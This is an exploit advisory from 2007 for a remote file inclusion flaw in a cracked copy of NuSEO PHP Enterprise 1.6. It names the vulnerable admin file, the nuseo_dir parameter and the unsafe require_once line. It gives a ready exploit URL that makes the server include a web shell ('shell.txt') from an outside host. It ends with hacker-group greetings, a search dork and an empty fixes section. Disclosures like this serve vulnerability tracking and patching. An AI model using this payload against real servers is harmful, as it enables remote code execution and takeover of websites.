NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability

2007-10-10 00:00:00

Vulnerability Type: Remote File Inclusion
Vulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseo_admin_d.php
Exploit URL: http://localhost/path/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuseo_dir
Line number: 268
Lines:

----------------------------------------------

require_once( $nuseo_dir . '/nuseo' . '_d.php' );
//nuseo_require_once( $nuseo_config['dir'] . '/admin/nuseo_admin_config_file' );

----------------------------------------------

GrEeTs To sHaDoW sEcUrItY TeAm & str0ke

FoUnD By BiNgZa

DoRk'SEO by NuSEO.PHP'

[email protected]

shadow.php0h.com

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.